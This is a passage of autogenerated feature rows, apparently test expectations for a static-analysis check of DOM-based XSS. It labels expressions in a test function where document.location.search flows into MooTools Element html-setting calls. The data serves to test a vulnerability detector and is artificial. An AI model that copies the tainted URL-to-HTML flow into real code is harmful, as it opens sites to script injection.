| +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source ... .search | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source ... .search | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:6:436:38 | source ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:22 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:22 | document | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:22 | document | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:22 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:31 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:31 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:31 | document.location | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:31 | document.location | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:31 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:38 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:38 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:38 | documen ... .search | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:38 | documen ... .search | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:15:436:38 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:24:436:31 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:24:436:31 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:24:436:31 | location | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:24:436:31 | location | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:24:436:31 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:436:33:436:38 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:436:33:436:38 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:436:33:436:38 | search | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:436:33:436:38 | search | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:436:33:436:38 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:438:2:438:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:438:6:438:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:438:6:438:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:438:6:438:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:438:6:438:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:438:6:438:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:438:14:438:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | exceptional return of new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | exceptional return of new Ele ... ource}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | exceptional return of new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | exceptional return of new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | exceptional return of new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | new Ele ... ource}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:2:439:35 | new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:6:439:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:6:439:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:6:439:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:6:439:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:6:439:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:14:439:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | InputArgumentIndex | 1 | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:21:439:34 | {text: source} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:25 | text | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:25 | text | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:25 | text | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:25 | text | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:25 | text | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:22:439:33 | text: source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | InputAccessPathFromCallee | ?.text | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | InputArgumentIndex | 1 | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | assignedToPropName | text | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:439:28:439:33 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | exceptional return of new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | exceptional return of new Ele ... ource}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | exceptional return of new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | exceptional return of new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | exceptional return of new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | new Ele ... ource}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:2:440:35 | new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:6:440:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:6:440:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:440:6:440:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:6:440:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:6:440:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | 